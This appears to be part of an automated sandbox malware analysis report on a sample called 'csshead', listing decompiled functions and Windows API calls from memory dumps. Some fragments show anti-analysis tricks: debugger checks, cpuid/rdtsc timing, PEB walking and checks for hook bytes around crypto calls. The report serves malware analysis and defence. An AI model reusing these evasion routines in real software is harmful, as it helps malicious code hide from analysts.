    				long* _v8;
    				int _v12;
    				BYTE* _v16;
    				int _v20;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b458)) != 0xe9) {
    					_v20 = CryptGenRandom(_v8, _v12, _v16);
    				}
    				return _v20;
    			}
    APIs
    • CryptGenRandom.ADVAPI32(?,?,?), ref: 00401561
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401B20(long* __eax, int __edx) {
    				long* _v8;
    				int _v12;
    				int _v16;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				if( *((char*)( *0x40b50c)) != 0xe9) {
    					_v16 = CryptReleaseContext(_v8, _v12);
    				}
    				return _v16;
    			}
    APIs
    • CryptReleaseContext.ADVAPI32(?,?), ref: 00401B3E
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CryptDestroyHash.ADVAPI32(?), ref: 004014E7
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401AF8(long* __eax) {
    				long* _v8;
    				int _v12;
    
    				_v8 = __eax;
    				if( *((char*)( *0x40b508)) != 0xe9) {
    					_v12 = CryptDestroyKey(_v8);
    				}
    				return _v12;
    			}
    APIs
    • CryptDestroyKey.ADVAPI32(?), ref: 00401B0F
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00405468() {
    				intOrPtr _v8;
    				struct _SYSTEMTIME _v24;
    
    				GetSystemTime( &_v24);
    				_v8 = E004053D4( &_v24);
    				return _v8;
    			}
    APIs
    • GetSystemTime.KERNEL32(?), ref: 00405472
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00406D40() {
    				int _v8;
    
    				_v8 = IsDebuggerPresent();
    				return _v8;
    			}
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 00406D44
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 71%
    			E00406C6C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v29;
    				void* _t19;
    
    				_v12 = __eax;
    				_push(__eax);
    				asm("cpuid");
    				_v8 = 0xbadbad;
    				_pop(_t19);
    				if(_v8 > 0) {
    					E00406C08(0x80000002,  &_v29);
    					E00401308(_v12,  &_v29);
    					E00406C08(0x80000003,  &_v29);
    					E0040133C(_v12,  &_v29);
    					E00406C08(0x80000004,  &_v29);
    					return E0040133C(_v12,  &_v29);
    				}
    				return _t19;
    			}
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 65%
    			E00406B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    
    				_v24 = __eax;
    				asm("rdtsc");
    				_v12 = __eax;
    				_v8 = __edx;
    				asm("cpuid");
    				asm("rdtsc");
    				_v20 = 0;
    				_v16 = __edx;
    				 *((intOrPtr*)(_v24 + 4)) = _v16;
    				 *_v24 = _v20;
    				return E00406A38(_v24,  &_v12);
    			}
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004024F8() {
    				intOrPtr _v8;
    				intOrPtr* _t10;
    
    				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
    				do {
    					_t10 =  *_t10;
    				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
    				_v8 =  *((intOrPtr*)(_t10 + 8));
    				return _v8;
    			}
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 46%
    			E004010B4(void* __eax, signed int __edx) {
    				signed int _v8;
    				intOrPtr _v16;
    				signed int _t9;
    				signed int _t11;
    
    				asm("rdtsc");
    				asm("adc eax, esp");
    				asm("rcl eax, 1");
    				_t9 = (__eax +  *0x40b118 ^ _t11) + _v16 ^ _t11 ^ __edx;
    				 *0x40b118 = _t9;
    				_v8 = _t9;
    				return _v8;
    			}
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMenu.USER32(?), ref: 0042173B
      • Part of subcall function 00413BC0: IsMenu.USER32(?), ref: 00413BD9
      • Part of subcall function 00413BC0: DestroyMenu.USER32(?), ref: 00413C12
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00413C37
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00413C44
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000416,00000000,00000000), ref: 00413C5B
      • Part of subcall function 00413BC0: GetMenuItemCount.USER32(?), ref: 00413C6C
      • Part of subcall function 00413BC0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
      • Part of subcall function 00413BC0: GetMenuItemInfoA.USER32 ref: 00413D39
      • Part of subcall function 00413BC0: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
      • Part of subcall function 00413BC0: SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000415,000000FF,?), ref: 00413DB9
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000442,00000000,?), ref: 00413E03
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00413E19
      • Part of subcall function 00413BC0: InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22
      • Part of subcall function 00413BC0: UpdateWindow.USER32(?), ref: 00413E2C
      • Part of subcall function 0041F4A0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
      • Part of subcall function 0041F4A0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
      • Part of subcall function 0041F4A0: LockResource.KERNEL32(00000000), ref: 0041F4D9
      • Part of subcall function 0041F4A0: LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596
      • Part of subcall function 0041F4A0: LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
      • Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F623
      • Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F652
    • SetMenu.USER32(?,00000000), ref: 00421766
      • Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
      • Part of subcall function 0041EBA0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
      • Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041EBE9
      • Part of subcall function 0041EBA0: CreateWindowExA.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,0000041E,00000014,00000000), ref: 0041ED13
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041ED1A
      • Part of subcall function 0041EBA0: GetStockObject.GDI32(0000000D), ref: 0041ED26
      • Part of subcall function 0041EBA0: GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
      • Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
      • Part of subcall function 0041EBA0: LoadResource.KERNEL32(?,00000000), ref: 0041ED83
      • Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041ED8A
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000413,?,?), ref: 0041EDF5
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000414,?,?), ref: 0041EE07
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000420,00000000,?), ref: 0041EE2D
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 0041EE5D
    • CreateWindowExA.USER32(00000000,ReBarWindow32,00000000,56002640,00000000,00000000,00000064,00000064,?,0000E800,00442B90,00000000), ref: 004217B3
    • SendMessageA.USER32 ref: 004217EF
    • SendMessageA.USER32(00000000,00000418,00000000,00000000), ref: 00421823
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • SendMessageA.USER32 ref: 0042187C
    • SendMessageA.USER32(00000000,0000041D,-00000001,00000000), ref: 004218B2
    • SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 004218D5
    • GetWindowRect.USER32(00000000,00000000), ref: 004218EB
    • SendMessageA.USER32(?,00000401,000000FF,?), ref: 00421926
    • SendMessageA.USER32(00000000,00000455,00000000,00000000), ref: 00421936
    • SendMessageA.USER32(00000000,00000454,00000000,00000000), ref: 00421944
    • SendMessageA.USER32(00000000,00000418,00000000,00000000), ref: 00421957
    • SendMessageA.USER32 ref: 004219AC
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 004219DA
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 004219FE
    • GetWindowRect.USER32(00000000,?), ref: 00421A14
    • SendMessageA.USER32(?,00000401,000000FF,?), ref: 00421A51
    • SendMessageA.USER32(00000000,00000455,00000000,00000000), ref: 00421A5F
    • SendMessageA.USER32(00000000,00000454,00000000,00000000), ref: 00421A6C
    • LoadStringA.USER32(00442B94,0000E001,?,00000080), ref: 00421A99
      • Part of subcall function 0041EA50: GetWindowLongA.USER32(?), ref: 0041EA81
      • Part of subcall function 0041EA50: GetWindowLongA.USER32(?,000000F0), ref: 0041EA90
      • Part of subcall function 0041EA50: GetWindowLongA.USER32(?,000000F0), ref: 0041EAA6
      • Part of subcall function 0041EA50: SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
      • Part of subcall function 0041EA50: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
      • Part of subcall function 0041EA50: CreateWindowExA.USER32(00000200,MDIClient,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90,773A8CD0), ref: 0041EB01
      • Part of subcall function 0041EA50: BringWindowToTop.USER32(00000000), ref: 0041EB18
      • Part of subcall function 0041E9C0: IsWindow.USER32(0000E900), ref: 0041E9D0
      • Part of subcall function 0041E9C0: IsWindow.USER32(?), ref: 0041E9E3
      • Part of subcall function 0041E9C0: GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
      • Part of subcall function 0041E9C0: SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12
    • GetCurrentThreadId.KERNEL32 ref: 00421BD2
      • Part of subcall function 0041F120: RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
      • Part of subcall function 0041F120: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    • LoadLibraryW.KERNEL32(USER32.DLL,00442C78,00000314,00000000), ref: 0042E446
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042E462
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E473
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042E480
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E483
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042E490
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E493
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042E4A0
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E4A3
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042E4B4
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E4B7
    • RtlDecodePointer.NTDLL(0044361C), ref: 0042E4D9
    • RtlDecodePointer.NTDLL ref: 0042E4E3
    • RtlDecodePointer.NTDLL(?), ref: 0042E522
    • RtlDecodePointer.NTDLL(?), ref: 0042E53C
    • RtlDecodePointer.NTDLL(00442C78), ref: 0042E550
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
    • GetCurrentThreadId.KERNEL32 ref: 00416B27
    • SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
    • UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
    • UpdateWindow.USER32(?), ref: 00416BC8
    • GetParent.USER32(?), ref: 00416BD4
    • GetParent.USER32(00000000), ref: 00416BE3
    • UpdateWindow.USER32(?), ref: 00416BEA
    • GetMenuItemCount.USER32(773B2CA0), ref: 00416C2A
    • GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
    • GetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CA3
    • lstrlen.KERNEL32(?), ref: 00416CDD
    • SetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CF8
    • ModifyMenuA.USER32(773B2CA0,00000000,?,?,00000000), ref: 00416D17
    • GetMenuItemCount.USER32(773B2CA0), ref: 00416D34
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SendMessageA.USER32 ref: 00416F08
    • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00416F2D
    • MapWindowPoints.USER32(?,00000000,0000041D,00000002), ref: 00416F3C
    • GetSubMenu.USER32(?,?), ref: 00416F7D
    • SendMessageA.USER32 ref: 00416FB0
    • SendMessageA.USER32(?,00000403,?,00000001), ref: 00416FC8
    • SendMessageA.USER32(?,00000448,?,00000000), ref: 00416FD6
      • Part of subcall function 00416AF0: RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
      • Part of subcall function 00416AF0: GetCurrentThreadId.KERNEL32 ref: 00416B27
      • Part of subcall function 00416AF0: SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36
      • Part of subcall function 00416AF0: TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
      • Part of subcall function 00416AF0: UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
      • Part of subcall function 00416AF0: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
      • Part of subcall function 00416AF0: UpdateWindow.USER32(?), ref: 00416BC8
      • Part of subcall function 00416AF0: GetParent.USER32(?), ref: 00416BD4
      • Part of subcall function 00416AF0: GetParent.USER32(00000000), ref: 00416BE3
      • Part of subcall function 00416AF0: UpdateWindow.USER32(?), ref: 00416BEA
      • Part of subcall function 00416AF0: GetMenuItemCount.USER32(773B2CA0), ref: 00416C2A
      • Part of subcall function 00416AF0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
      • Part of subcall function 00416AF0: GetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CA3
      • Part of subcall function 00416AF0: lstrlen.KERNEL32(?), ref: 00416CDD
      • Part of subcall function 00416AF0: SetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CF8
      • Part of subcall function 00416AF0: ModifyMenuA.USER32(773B2CA0,00000000,?,?,00000000), ref: 00416D17
      • Part of subcall function 00416AF0: GetMenuItemCount.USER32(773B2CA0), ref: 00416D34
    • SendMessageA.USER32(?,00000403,?,00000000), ref: 00417026
    • GetFocus.USER32 ref: 0041702B
    • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041703F
    • PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 00417083
    • PtInRect.USER32(?,?,?), ref: 00417098
    • PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 004170B7
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 004170DB
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 004170EF
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 004170FB
    • PostMessageA.USER32(?,00442B50,?,00000000), ref: 0041711C
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00417140
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
    • SendMessageA.USER32(?,00000448,?,00000000), ref: 00417195
    • SendMessageA.USER32(?,00000449,00000001,00000000), ref: 004171A4
    Strings
    • WTL_CmdBar_InternalAutoPopupMsg, xrefs: 004170EA
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • DrawEdge.USER32(?,?,00000006,00000002), ref: 00415CE8
    • OffsetRect.USER32(?,00000000,?), ref: 00415D68
    • GetSysColor.USER32(0000000F), ref: 00415DE9
    • SetTextColor.GDI32(?,00000000), ref: 00415DED
    • GetSysColor.USER32(00000014), ref: 00415DF9
    • SetBkColor.GDI32(?,00000000), ref: 00415DFD
      • Part of subcall function 00412AC0: CreatePatternBrush.GDI32(00000000), ref: 00412B14
      • Part of subcall function 00412AC0: DeleteObject.GDI32(00000000), ref: 00412B1D
    • SetBrushOrgEx.GDI32(?,?,?,00000000), ref: 00415E20
    • FillRect.USER32(?,?,77397600), ref: 00415E2D
    • SetTextColor.GDI32(?,?), ref: 00415E39
    • SetBkColor.GDI32(?,?), ref: 00415E45
    • DeleteObject.GDI32(77397600), ref: 00415E50
    • DrawEdge.USER32(?,?,?,0000000F), ref: 00415EA4
    • FillRect.USER32(?,?,00000005), ref: 00415EDA
    • FillRect.USER32(?,?,00000005), ref: 00415EED
    • GetSysColorBrush.USER32(00000004), ref: 00415F0E
    • GetSysColorBrush.USER32(00000010), ref: 00415F16
    • GetSysColorBrush.USER32(00000014), ref: 00415F1B
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
      • Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
      • Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
      • Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
      • Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00415F63
    • GetSysColor.USER32(-00000004), ref: 00415FCE
    • FillRect.USER32(?,?,-00000003), ref: 0041601C
    • SetBkMode.GDI32(?,00000001), ref: 0041604B
    • GetSysColor.USER32(-00000007), ref: 0041607C
    • OffsetRect.USER32(?,00000001,00000001), ref: 004160BA
    • GetSysColor.USER32(00000014), ref: 004160C2
      • Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,7740E270), ref: 00412A33
      • Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
      • Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
      • Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMenuItemCount.USER32(?), ref: 00415083
    • GetVersionExA.KERNEL32(?,?,?,00000090,?,?,00000030), ref: 0041510E
    • GetMenuItemInfoA.USER32 ref: 0041516C
    • CharNextA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151A6
    • CharLowerA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151C7
    • CharLowerA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151D2
    • PostMessageA.USER32(?,00000448,000000FF), ref: 00415226
    • SendMessageA.USER32(?,0000044E,?,?), ref: 00415284
    • PostMessageA.USER32(?,00000448,000000FF), ref: 0041529F
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
      • Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
      • Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
      • Part of subcall function 00411630: LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
      • Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
      • Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
      • Part of subcall function 00411630: PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
      • Part of subcall function 00411630: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    • IsWindowEnabled.USER32(?), ref: 004152E4
    • GetClientRect.USER32(?,?), ref: 0041530D
    • SendMessageA.USER32(?,0000041D,?,?), ref: 00415338
    • SendMessageA.USER32(?,00000417,?,?), ref: 00415363
      • Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
      • Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2
    • PostMessageA.USER32(?,00000100,00000028), ref: 004153AD
      • Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    • MessageBeep.USER32 ref: 004153D2
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsMenu.USER32(?), ref: 00413BD9
    • UpdateWindow.USER32(?), ref: 00413E2C
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
